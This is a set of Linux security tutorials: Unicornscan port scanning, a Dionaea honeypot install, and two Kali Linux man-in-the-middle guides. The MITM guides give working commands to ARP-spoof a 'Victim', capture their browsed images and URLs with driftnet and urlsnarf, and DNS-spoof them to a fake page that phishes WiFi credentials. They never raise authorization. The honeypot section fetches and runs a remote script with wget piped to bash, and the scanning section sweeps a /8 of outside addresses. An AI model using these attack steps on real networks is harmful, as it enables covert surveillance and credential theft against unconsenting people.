  • Active and passive remote OS and application detection
  • PCAP file logging and filtering
  • Capable of sending packets with OS fingerprints different from the host’s OS
  • Relational database output for storing the results of your scans
  • Customizable module support to fit the system being pentested
  • Customized data set views
  • Has its own TCP/IP stack, a distinguishing feature that sets it apart from other port scanners
  • Comes built into Kali Linux; no download needed

Performing a simple scan with Unicornscan

The most basic scan with Unicornscan scans a single host IP. Type the following in the terminal to perform the basic scan with Unicornscan:

$ sudo unicornscan 192.168.100.35

Here, we’ve tried this scan on a Windows 7 system connected to our network. The basic scan has listed the TCP ports on the system we’re scanning. Notice the similarity to the -sS scan in nmap; the key difference is that Unicornscan doesn’t use ICMP by default. Of the ports reported, only ports 135, 139, 445, and 554 are open.
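Because the output is plain text, it is easy to script against. Here is a minimal sketch that pulls just the open port numbers out of a saved scan; the sample lines imitate Unicornscan’s output format, so treat the exact spacing as an assumption:

```shell
# Extract the numeric port from lines like:
#   TCP open            ftp[   21]  from 192.168.100.35  ttl 128
# (the sample lines below are illustrative, not real scan output)
open_ports() {
  sed -n 's/.*open.*\[ *\([0-9][0-9]*\)\].*/\1/p'
}

printf '%s\n' \
  'TCP open                  ftp[   21]  from 192.168.100.35  ttl 128' \
  'TCP open              netbios[  139]  from 192.168.100.35  ttl 128' \
  | open_ports
```

Piping a real scan through `open_ports` gives you a bare list of ports you can feed into follow-up tooling.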

Scanning multiple IPs with Unicornscan

We will make a slight modification to the basic scan syntax to scan multiple hosts; notice the subtle difference from the scan commands we use in nmap and hping. The targets are placed in sequence to initiate scanning:

$ sudo unicornscan 192.168.100.35 192.168.100.45

Make sure you don’t place any commas between the addresses, or the interface will not recognize the command.

Scanning Class C networks with Unicornscan

Let’s move on to scanning an entire class C network. We will use CIDR notation such as 192.168.1.0/24 to scan all 254 host IP addresses. If we wanted to find all the IPs with port 31 open, we’d add :31 after the CIDR notation:

$ sudo unicornscan 192.168.100.35/24:31

Unicornscan has successfully returned all the hosts that have port 31 open. The cool thing about Unicornscan is that it doesn’t stop at our own network, where speed is a limiting factor. Suppose all systems with port 1020 open had a certain vulnerability. Without even knowing where these systems are, we could scan all of them. Although scanning such a large number of systems can take ages, it is better to divide them into smaller scans.
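A /24 covers 2^(32-24) = 256 addresses, of which 254 are usable hosts once the network and broadcast addresses are excluded. A quick shell sketch of the arithmetic, handy when sizing larger sweeps:

```shell
# Usable host count for a given prefix length: 2^(32-prefix) minus the
# network and broadcast addresses.
cidr_hosts() {
  echo $(( (1 << (32 - $1)) - 2 ))
}

cidr_hosts 24   # a class C sized block
cidr_hosts 8    # a whole /8 sweep, which is why such scans take ages
```

The /8 case returns over sixteen million hosts, which makes the advice to split big scans into smaller ones concrete.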

TCP scanning with Unicornscan

Unicornscan can perform targeted TCP scans as well. We’ll designate linuxhint.com as our target and scan for ports 67 and 420. For this specific scan, we’ll send 33 packets per second. Before mentioning the ports, we’ll instruct Unicornscan to send 33 packets per second by adding -r33 to the syntax, and -mT to indicate that we want to scan (m) using the TCP protocol (T). The website name follows these flags:

$ sudo unicornscan -r33 -mT linuxhint.com:67,420

UDP scanning:

We can also scan for UDP ports with unicornscan. Type:

$ sudo unicornscan -r300 -mU linuxhint.com

Notice that we’ve replaced the T with a U in the syntax. This specifies that we’re looking for UDP ports, since Unicornscan only sends TCP SYN packets by default.

Our scan has not reported any open UDP ports. This is because open UDP ports are typically a rare find. However, you may come across an open port 53 or port 161.

Saving results to a PCAP file

You can export the received packets to a PCAP file in a directory of your choice and perform network analysis later. To find hosts with port 5505 open, type:

$ sudo unicornscan 216.1.0.0/8:5505 -r500 -w huntfor5505.pcap -W1 -s 192.168.100.35
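If you run hunts like this regularly, a dated output filename keeps captures from overwriting each other. The helper below only builds the name; the scan flags themselves are unchanged, and the naming scheme is just a suggestion:

```shell
# Build a capture filename like huntfor5505-20200825.pcap from the port
# being hunted and today's date.
pcap_name() {
  printf 'huntfor%s-%s.pcap\n' "$1" "$(date +%Y%m%d)"
}

pcap_name 5505
```

You would then pass the result to -w, e.g. `-w "$(pcap_name 5505)"`.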

Wrapping up: Why we recommend Unicornscan

Simply put, Unicornscan does everything that a typical port scanner does, and does it better. For example, scanning is much quicker with Unicornscan than with other port scanners, because the others rely on the host operating system’s TCP/IP stack while Unicornscan brings its own. This comes in particularly handy when you’re scanning massive corporate networks as a pentester. You may come across hundreds of thousands of addresses, and time becomes a deciding factor in how successful the scan is.

Unicornscan Cheat Sheet

Here’s a quick cheat sheet to help with basic scans with Unicornscan that might come in handy.

SYN scan : -mT
ACK scan : -mTsA
FIN scan : -mTsF
Null scan : -mTs
Xmas scan : -mTsFPU
Connect scan : -msf -Iv
Full Xmas scan : -mTFSRPAU
Scan ports 1 through 5 : -mT host:1-5
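The cheat sheet maps directly onto a small lookup helper that is handy in wrapper scripts; the flag strings below are taken verbatim from the table above, while the helper itself and its name are our own sketch:

```shell
# Map a scan-type name to the Unicornscan flags from the cheat sheet.
uscan_flags() {
  case "$1" in
    syn)      echo "-mT" ;;
    ack)      echo "-mTsA" ;;
    fin)      echo "-mTsF" ;;
    null)     echo "-mTs" ;;
    xmas)     echo "-mTsFPU" ;;
    connect)  echo "-msf -Iv" ;;
    fullxmas) echo "-mTFSRPAU" ;;
    *) echo "unknown scan type: $1" >&2; return 1 ;;
  esac
}

# e.g.: sudo unicornscan $(uscan_flags xmas) 192.168.100.35:1-5
uscan_flags xmas
```

An unknown name fails loudly rather than silently running the wrong scan.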

Conclusion:

In this tutorial, I have explained the Unicornscan tool and how to use it with examples. I hope you’ve learned the basics, and that this article helps you in pentesting with Kali Linux.

]]>
What is a Zero-Day Exploit? https://linuxhint.com/zero_day_exploit_beginners_tutorial/ Tue, 25 Aug 2020 19:07:28 +0000 https://linuxhint.com/?p=66282 A zero-day exploit is the crown prize of hackers: an attacker finds a vulnerability in a system that neither the vendor nor the public is aware of. There is no patch and no defense against it other than removing the affected service from the system. It’s called a zero-day because software developers have had zero days to patch the flaw, and because nobody knows about the exploit, it is very dangerous.

To get a zero-day, there are two options: develop your own or capture one developed by others. Developing a zero-day on your own can be a monotonous and long process; it requires great knowledge and can take a lot of time. On the other hand, a zero-day developed by others can be captured and reused, and many hackers use this approach. In this tutorial, we set up a honeypot that appears unsafe, then wait for attackers to be drawn to it; their malware is captured when they break into our system. A hacker could use that malware again on any other system, so the basic goal is to capture the malware first.

Dionaea:

Dionaea was developed by Markus Koetter and is named after the carnivorous Venus flytrap plant. Primarily, it is a low-interaction honeypot. Dionaea emulates services that attackers target, for instance HTTP, SMB, etc., and imitates an unprotected Windows system. Dionaea uses libemu to detect shellcode, can make us vigilant about the shellcode and then capture it, sends concurrent notifications of attacks via XMPP, and records the information in an SQLite database.

Libemu:

Libemu is a library used for shellcode detection and x86 emulation. Libemu can detect malware embedded in documents such as RTF, PDF, etc., and flag hostile behavior using heuristics. This is an advanced form of honeypot, and beginners should not try it.

I recommend not using Dionaea on a system that will be used for other purposes, as the libraries and code we install may damage other parts of your system. Dionaea is also unsafe in itself: if it gets compromised, your whole system can get compromised. For this reason, a lean install should be used; Debian and Ubuntu systems are preferred.

Install dependencies:

Dionaea is composite software that requires many dependencies not installed by default on systems like Ubuntu and Debian. So we will have to install the dependencies before installing Dionaea, and it can be a tedious task.

For example, we need to download the following packages to begin.

$ sudo apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev \
  libreadline-dev libsqlite3-dev python-dev libtool automake autoconf \
  build-essential subversion git-core flex bison pkg-config libnl-3-dev \
  libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev sqlite3

A script by Andrew Michael Smith can be downloaded from GitHub using wget.

Once downloaded, this script will install the applications (SQLite) and dependencies, then download and configure Dionaea.

$ wget -q https://raw.github.com/andremichaelsmith/honeypot-setup-script/master/setup.bash \
  -O /tmp/setup.bash && bash /tmp/setup.bash

Choose an interface:

After the dependencies and applications are downloaded, Dionaea will configure itself and ask you to select the network interface you want the honeypot to listen on.

Configuring Dionaea:

Now the honeypot is all set and running. In future tutorials, I will show you how to identify attackers’ artifacts, how to set up Dionaea to alert you in real time during an attack, and how to review and capture the shellcode of an attack. We will test our attack tools and Metasploit to check whether we can capture malware before placing the honeypot live online.

Open the Dionaea configuration file:

Open the Dionaea configuration file in this step.

$ cd /etc/dionaea

Vim or any other text editor will work; Leafpad is used in this case.

$ sudo leafpad dionaea.conf

Configure logging:

In several cases, log files grow to multiple gigabytes. Log error priorities should be configured; for this purpose, scroll down to the logging section of the file.

Interface and IP section:

In this step, scroll down to the interface and listen sections of the configuration file. We want the interface to be set to manual, so that Dionaea will capture on an interface of your own choice.

Modules:

Now the next step is to set up the modules for the efficient functioning of Dionaea. We will be using p0f for operating system fingerprinting; this will help transfer data into the SQLite database.

Services:

Dionaea is set up to run HTTPS, HTTP, FTP, TFTP, SMB, epmap, SIP, MSSQL, and MySQL.

Disable HTTP and HTTPS, because hackers are not likely to be fooled by them and they are not vulnerable. Leave the others enabled, because they are unsafe services that can easily be attacked by hackers.

Start dionaea to test:

We have to run Dionaea to test our new configuration. We can do this by typing:

$ sudo dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/run/dionaea.pid
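To verify the daemon actually stayed up, you can check the pid file passed with -p. This is a generic sketch; the path below matches the command above, so adjust it if yours differs:

```shell
# Returns success if the process named in the pid file is still alive.
dionaea_running() {
  pidfile=$1
  [ -f "$pidfile" ] && kill -0 "$(cat "$pidfile")" 2>/dev/null
}

if dionaea_running /opt/dionaea/run/dionaea.pid; then
  echo "dionaea is running"
else
  echo "dionaea is not running"
fi
```

`kill -0` sends no signal; it only tests whether the process exists, which makes it a cheap liveness probe for any daemon with a pid file.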

Now that Dionaea is running successfully, we can analyze and capture malware with its help.

Conclusion:

Zero-day exploits can make hacking easy, since they target software vulnerabilities nobody knows about. A honeypot that looks vulnerable is a great way to attract the attackers who use them, letting you capture their malware before it is used elsewhere. I hope this article helps you learn more about zero-day exploits.

]]>
ARP spoofing using a man-in-the-middle Attack https://linuxhint.com/arp_spoofing_using_man_in_the_middle_attack/ Thu, 20 Aug 2020 18:48:50 +0000 https://linuxhint.com/?p=65924

Performing Man In The Middle Attacks with Kali Linux

Man in the Middle attacks are some of the most frequently attempted attacks on network routers. They’re used mostly to acquire login credentials or personal information, spy on the Victim, or sabotage communications and corrupt data.

A man in the middle attack is one where an attacker intercepts the stream of back-and-forth messages between two parties, either to alter the messages or just to read them.

In this quick guide, we will see how to perform a Man in the Middle attack on a device connected to the same WiFi network as ours, and see which websites it visits most often.

Some pre-requisites

The method we’re going to use will employ Kali Linux, so it’ll help to have a certain degree of familiarity with Kali before we start.

To start with our attacks, the following are crucial prerequisites:

  • the name of the network interface installed on our machine
  • the IP of the WiFi router that our Victim uses

View the network interface configuration

Run the following command in the terminal to find out the name of the network interface that you’re using:

$ sudo ifconfig

You will see a long list of network interfaces, out of which you have to choose one and note it down somewhere.

As for the IP of the Router you’re using, use:

$ ip route show

Run it in the terminal, and you will be shown the IP of your network router. For the further steps, I have logged in to Kali in root mode.
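If you’d rather script the lookup than eyeball the output, the gateway is the third field of the `default via` line. The sample line below is illustrative; in real use you would pipe `ip route show` into the helper:

```shell
# Print the gateway address from `ip route show` output.
default_gw() {
  awk '/^default via/ { print $3; exit }'
}

# Real use: ip route show | default_gw
echo 'default via 192.168.100.1 dev wlan0 proto dhcp metric 600' | default_gw
```

The `exit` stops awk after the first default route, in case the machine has several.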

STEP 1: Obtain the IP configuration of the Victim

Next up, you need to get the IP of your Victim. This is easy, and there are several different ways to find it. For instance, you can use a network monitoring tool, or you can download a router user-interface program that lists all the devices and their IPs on a particular network.

STEP 2: Turn on packet forwarding in Linux

This is very important, because if your machine isn’t forwarding packets, the attack will fail as the Victim’s internet connection will be disrupted. By enabling packet forwarding, you disguise your local machine to act as the network router.

To turn on packet forwarding, run the following command in a new terminal:

$ sysctl -w net.ipv4.ip_forward=1
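You can confirm the kernel actually took the setting by reading it back from /proc. The read-only check below works without root; enabling forwarding still needs the sysctl command above:

```shell
# Success when IPv4 packet forwarding is enabled.
forwarding_enabled() {
  [ "$(cat /proc/sys/net/ipv4/ip_forward 2>/dev/null)" = "1" ]
}

if forwarding_enabled; then
  echo "packet forwarding is on"
else
  echo "packet forwarding is off"
fi
```

Running this again after Step 6’s cleanup confirms you have put the machine back in its normal state.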

STEP 3: Redirect packets to your machine with arpspoof

Arpspoof is a preinstalled Kali Linux utility that lets you redirect traffic on a switched LAN to a machine of your choice. This is why arpspoof serves as the most accurate way to redirect traffic, practically letting you sniff traffic on the local network.

Use the following syntax to start intercepting packets from the Victim to your Router:

$ arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]

This has only enabled monitoring of the incoming packets from the Victim to the Router. Do not close the terminal just yet, as that will stop the attack.

STEP 4: Intercept packets from the Router

You’re doing the same here as in the previous step, just reversed. Leaving the previous terminal open as it is, open up a new terminal to start extracting packets from the Router. Type the following command with your network interface name and the router IP:

$ arpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]
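The two invocations differ only in argument order, so a tiny helper avoids typos. This sketch just prints both commands so you can inspect them; swap echo for the real calls on Kali, and note that the interface and addresses shown are placeholders:

```shell
# Print both arpspoof directions for a given interface/victim/router.
mitm_commands() {
  iface=$1 victim=$2 router=$3
  echo "arpspoof -i $iface -t $victim $router"
  echo "arpspoof -i $iface -t $router $victim"
}

mitm_commands wlan0 192.168.100.20 192.168.100.1
```

In a real run you would launch each printed command in its own terminal, exactly as the steps above describe.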

You’re probably realizing at this point that we’ve switched the position of the arguments in the command we used in the previous step.

Up till now, you’ve infiltrated the connection between your Victim and the Router.

STEP 5: Sniffing images from the target’s browser history

Let’s see which websites our target likes to visit often and which images they see there. We can achieve this using specialized software called driftnet.

Driftnet is a program that lets us monitor the network traffic from certain IPs and discern images from TCP streams in use. The program can display the images in JPEG, GIF, and other image formats.

To see which images are being viewed on the target machine, use the following command:

$ driftnet -i [Network Interface Name]

STEP 6: Sniffing URLs information from victim navigation

You can also sniff out the URLs of the websites our Victim often visits. The program we’re going to use is a command-line tool known as urlsnarf. It sniffs out and saves HTTP requests from a designated IP in the Common Log Format, which makes it a fantastic utility for offline post-processing and traffic analysis with other network forensics tools.

The syntax you’ll put in the command terminal to sniff out the URLs is:

$ urlsnarf -i [Network interface name]
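Since urlsnarf logs in Common Log Format, the requested path is easy to pull back out of a saved log with awk. The sample line below is illustrative, not real capture output:

```shell
# Print the request path from Common Log Format lines (the request is
# the quoted field: "METHOD /path PROTOCOL").
extract_urls() {
  awk -F'"' '{ split($2, req, " "); if (req[2] != "") print req[2] }'
}

echo '192.168.100.20 - - [20/Aug/2020:18:48:50 +0000] "GET /login.html HTTP/1.1" 200 5124' \
  | extract_urls
```

Splitting on the double quote isolates the request string, and the second word of that string is the path.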

As long as each terminal is still running and you haven’t accidentally closed one of them, things should have gone smoothly for you so far.

Stopping the attack

Once you’re satisfied with what you’ve got your hands on, you may stop the attack by closing each terminal. You can use the Ctrl+C shortcut to do so quickly.

And don’t forget to disable the packet forwarding that you enabled to carry out the attack. Type the following command in the terminal:

$ sysctl -w net.ipv4.ip_forward=0

Wrapping things up:

We’ve seen how to infiltrate a system through a MITM attack and how to get our hands on the browsing history of our Victim. There’s a whole lot you can do with the tools we’ve seen in action here, so make sure to check out our walkthroughs on each of these sniffing and spoofing tools.

We hope you’ve found this tutorial helpful and that you’ve successfully carried out your first Man In the Middle attack.

]]>
Man in the middle attacks https://linuxhint.com/mimt_attacks_linux/ Thu, 20 Aug 2020 17:54:05 +0000 https://linuxhint.com/?p=65898 You are probably already familiar with the man in the middle attacks: the attacker covertly intercepts the messages between two parties by tricking each into thinking that they’ve established communication with the intended party. Being able to intercept messages, an attacker can even influence communication by injecting false messages.

One example of such an attack is where a victim logs into a WiFi network and an attacker on the same network gets them to give away their user credentials on a phishing page. We will be talking about this technique in particular, which is known as phishing.

Although it is detectable through authentication and tamper detection, it’s a common tactic used by many hackers who manage to pull it off on the unsuspecting. Therefore, it’s worth any cybersecurity enthusiast’s time to know how it works.

To be more specific about the demonstration we’re presenting here, we will use a man in the middle attack to redirect traffic from our target to a false webpage and reveal WiFi passwords and usernames.

The procedure

Although there are more tools in Kali Linux well suited to executing MITM attacks, we’re using Wireshark and Ettercap here, both of which come preinstalled in Kali Linux. We might discuss the others we could have used in a future article.

Also, we’ve demonstrated the attack on Kali Linux live, which we also recommend our readers use when carrying out this attack. That said, you may well end up with the same results using Kali on VirtualBox.

Fire-up Kali Linux

Launch the Kali Linux machine to get started.

Set up the DNS config file in Ettercap

Open the command terminal and change the DNS configuration of Ettercap by opening the following file in the editor of your choice:

$ gedit /etc/ettercap/etter.dns

You will be displayed the DNS configuration file.

Next, you’ll need to add a line with your own address to the file:

* A 10.0.2.15

Check your IP address by typing ifconfig in a new terminal if you don’t already know what it is.

To save changes, press Ctrl+X, then press Y.
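Editing by hand works, but the record can also be appended non-interactively. The sketch below works on a temp copy so you can try it safely; point tee at /etc/ettercap/etter.dns (with sudo) for the real file, and the IP is whatever ifconfig reported for you:

```shell
# Append the spoofed wildcard record to a (temp copy of) etter.dns,
# then show it to confirm the write.
cfg=$(mktemp)
echo '* A 10.0.2.15' | tee -a "$cfg" > /dev/null
grep '^\* A' "$cfg"
rm -f "$cfg"
```

`tee -a` is the usual trick for appending to a root-owned file under sudo, where a plain `>>` redirect would run as your own user and fail.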

Prepare the Apache server

Now, we will move our fake security page to a location on the Apache server and run it. You will need to move your fake page to this apache directory.

Run the following command to empty the HTML directory:

$ rm /var/www/html/*

Next up, you’ll need to save your fake security page and move it into the directory we’ve mentioned. Type the following in the terminal to move it:

$ mv /root/Desktop/fake.html /var/www/html

Now fire up the Apache Server with the following command:

$ sudo service apache2 start

You’ll see that the server has successfully launched.

Spoofing with Ettercap addon

Now we’ll see how Ettercap would come into play. We will be DNS spoofing with Ettercap. Launch the app by typing:

$ ettercap -G

You can see that it’s a GUI utility, which makes it much easier to navigate.

Once the app has opened, hit the Sniff menu and choose Unified sniffing.

Select the network interface that’s in your use at the moment:

With that set, click on the Hosts tab and choose one from the list. If no appropriate host is shown, you may click “Scan for hosts” to see more options.

Next, designate the Victim as Target 2 and your IP address as Target 1. You can designate the Victim by clicking on the Target 2 button and then on the “Add to target” button.

Next, hit the MITM tab and select ARP poisoning.

Now navigate to the Plugins tab, click on the “Manage the plugins” section, and activate DNS spoofing.

Then move to the Start menu, where you can finally begin the attack.

Catching the HTTP traffic with Wireshark

This is where it all culminates into some actionable and relevant results.

We will be using Wireshark to capture the HTTP traffic and try to retrieve the passwords from it.

To launch Wireshark, open a new terminal and enter wireshark.

With Wireshark up and running, instruct it to filter out any traffic packets other than HTTP packets by typing http in the “Apply a display filter” field and hitting Enter.

Now, Wireshark will ignore every other packet and only capture HTTP packets.

Now, look out for every packet that contains the word “POST” in its description:

Conclusion

When we talk about hacking, MITM is a vast area of expertise. A single type of MITM attack can be approached in several unique ways, and the same goes for phishing attacks.

We’ve looked at the simplest yet very effective way to get hold of a whole lot of juicy information that may have future prospects. Kali Linux has made this sort of stuff really easy since its release in 2013, with its built-in utilities serving one purpose or another.

Anyway, that’s about it for now. I hope you’ve found this quick tutorial useful, and hopefully, it has helped you get started with phishing attacks. Stick around for more tutorials on MITM attacks.

]]>